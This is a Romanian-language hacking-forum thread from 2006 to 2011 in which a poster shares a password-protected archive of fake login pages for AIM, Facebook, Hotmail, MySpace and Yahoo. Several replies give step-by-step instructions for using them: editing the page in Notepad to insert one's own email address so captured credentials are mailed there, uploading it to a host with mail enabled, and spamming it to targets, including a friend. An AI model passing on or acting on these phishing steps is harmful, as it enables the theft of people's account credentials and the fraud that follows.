zexe Posted August 15, 2006 Report Posted August 15, 2006 Fisiere :Fake AIM Login Page.rarFake Facebook Login Page.rarFake Hotmail Login Page.rarFake MySpace Login Page.rarFake Yahoo Login Page.rarhttp://rapidshare.de/files/29526055/123fake.rar.html Parola este : rstEnjoy Quote
koyotes Posted September 13, 2006 Report Posted September 13, 2006 deci eu ai trimit una dintre pagini la un prieten... el se logheaza, si eu de unde aflu ce a scris el acolo?unde pun mailul meu ca sami trimita datele? Quote
misti Posted September 28, 2006 Report Posted September 28, 2006 mie imi da o eroare Warning: reset() [function.reset]: Passed variable is not an array or object in /users/sunt.ws/m/mi/misti/thanks.php on line 6Warning: Variable passed to each() is not an array or object in /users/sunt.ws/m/mi/misti/thanks.php on line 8 Quote
eddie47 Posted September 28, 2006 Report Posted September 28, 2006 koyotes wrote: deci eu ai trimit una dintre pagini la un prieten... el se logheaza, si eu de unde aflu ce a scris el acolo?unde pun mailul meu ca sami trimita datele?Dude...faci asa:1. Downloadezi scamu'2. Dupa ce ai dld, click dreapta Open With Notepad3. Schimbi mailul care e deja scris pe-acolo cu mailu' tau4. Urci scamu' pe un host fara bannere si reclame5. Spam6. Enjoy7. Nu e un al 7-lea lucru [vorba lu' Screech Peace out Quote
F1BDM7 Posted September 28, 2006 Report Posted September 28, 2006 eddie47 wrote: 4. Urci scamu' pe un host fara bannere si reclamesi cu functia mail activata Quote
koyotes Posted October 4, 2006 Report Posted October 4, 2006 mail nu am gasit decat in thanks.php il ala il schimb? Quote
MaHaReT Posted October 4, 2006 Report Posted October 4, 2006 deschizi scamu[.html] in Notepad , tastezi F3 sau mergi la Edit - Find Next - si scri @yahoo.com , te va duce la un e-mail , no in loc de ce scrie in fatxa la @yahoo.com [ex. [mail]RsT-Crew@yahoo.com[/mail]] u scri e-mailu tdau in loc de RsT-Crew .... ! sper ca-i intzeles ! Quote
DANG3R Posted October 8, 2006 Report Posted October 8, 2006 intrebare de 1000 de puncte cum trebe facut pana la urma cu scamu ala de yahoo ca sa orbesc daca gasesc unde tre pus mailu meu :@ Quote
MaHaReT Posted October 8, 2006 Report Posted October 8, 2006 aolio , cum sa va explica deci , privitzi pozele urmatoare :1.Clic dreapta pe scam - open with - notepad2.edit - find next - si scrii @yahoo.com 3.te da la @yahoo.com , modifici ce scrie in fatza , cu e-mailu tau [asta cred ca stitzi plm]daca nici acuma nu intzelegetzi .... ! Quote
sony_buzi Posted November 7, 2006 Report Posted November 7, 2006 Ba bagamias dar nu se incarca de fiecare data toata pagina...rar se incarca total...din 10 daca se intampla de 3 Quote
execut_kay Posted March 3, 2011 Report Posted March 3, 2011 din cate vad scrie @yihoo.com poate de aceea nu va gaseste Quote